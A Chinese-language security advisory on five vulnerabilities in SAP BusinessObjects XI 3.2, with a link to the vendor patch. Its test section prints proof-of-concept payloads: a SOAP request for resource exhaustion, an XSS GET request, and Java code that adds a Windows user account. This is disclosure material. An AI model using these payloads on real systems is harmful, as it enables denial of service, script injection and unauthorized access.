安全研究

安全漏洞
SAP BusinessObjects多个远程安全漏洞

发布日期:2010-09-22
更新日期:2010-10-26

受影响系统:
SAP BusinessObjects XI 3.2 Enterprise
描述:
BUGTRAQ  ID: 44268
CVE ID: CVE-2010-3979,CVE-2010-3980,CVE-2010-3981,CVE-2010-3982,CVE-2010-3983

SAP BusinessObjects是一款商务智能软件和企业绩效解决方案。

远程攻击者可以利用SAP BusinessObjects的多个脚本和组件中的安全漏洞提升权限、导致拒绝服务、泄露敏感信息或执行跨站脚本。

1) dswsbobje/services/session的login SOAP方式根据Login参数的不同而返回不同的响应代码,这可以用于枚举有效的用户账号。

2) 在创建CUID期间dswsbobje/services/biplatformHTTP的GenerateCuids SOAP方式中的错误可能允许用户通过传送超长的numCuids参数耗尽可用的资源。

3) 由于没有正确的过滤提交给dswsbobje/axis2-admin/engagingglobally的modules参数便返回给了用户,这可能导致跨站脚本攻击。

4) CrystalReports/viewrpt.cwr脚本允许通过apstoken参数向任意主机发起连接,这可能导致在受限制的网络中执行端口扫描。

5) Central Configuration Manager中的错误允许用户通过Program Job Server获得权限提升。

<*来源:Joshua Abraham
        Will Vandevanter
  
  链接:http://secunia.com/advisories/38271/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://www.example.com:6405/AnalyticalReporting/AnalyticalReporting_merge_web.xml

  <?xml version="1.0" encoding="UTF-8" ?>
- <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
- <soapenv:Body>
- <GenerateCuids xmlns="http://biplatform.dsws.businessobjects.com/2007/06/01">
  <SessionID xmlns="http://biplatform.dsws.businessobjects.com/2007/06/01">it- dirs8l4vkou4%3A6400|%40it-dirs8l4vkou4%3A6400|it- dirs8l4vkou4%3A6400%402149JabmPLnS4EzOXTzw2148JfhkJg2K28oTJ1Nq|osca%3Aiiop %3A%2F%2Fit- dirs8l4vkou4%3A6400%3BSI_SESSIONID%3D2148JfhkJg2K28oTJ1Nq|en_US|America/Los_ Angeles”></SessionID>
  <numCuids xmlns="http://biplatform.dsws.businessobjects.com/2007/06/01">100000</numCuids>
  </GenerateCuids>
  </soapenv:Body>
  </soapenv:Envelope>

GET /dswsbobje/axis2-
     admin/engagingglobally?modules="%3e%20%3cXSS%3e&submit=+Engage+
     HTTP/1.1
Host: x.x.x.x:8080


package org.apache.axis2.axis2userguide;
import java.io.IOException;
public class AddUser {
  public AddUser() {
  }
  public void main() {
    Process process;
    try {
      process = Runtime.getRuntime().exec("net user foo bar /add");
    }
    catch(IOException ioexception) {
      ioexception.printStackTrace();
    }
    return;
  }
}

建议:
厂商补丁:

SAP
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

https://service.sap.com/sap/support/notes/1432881

浏览次数:2222
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障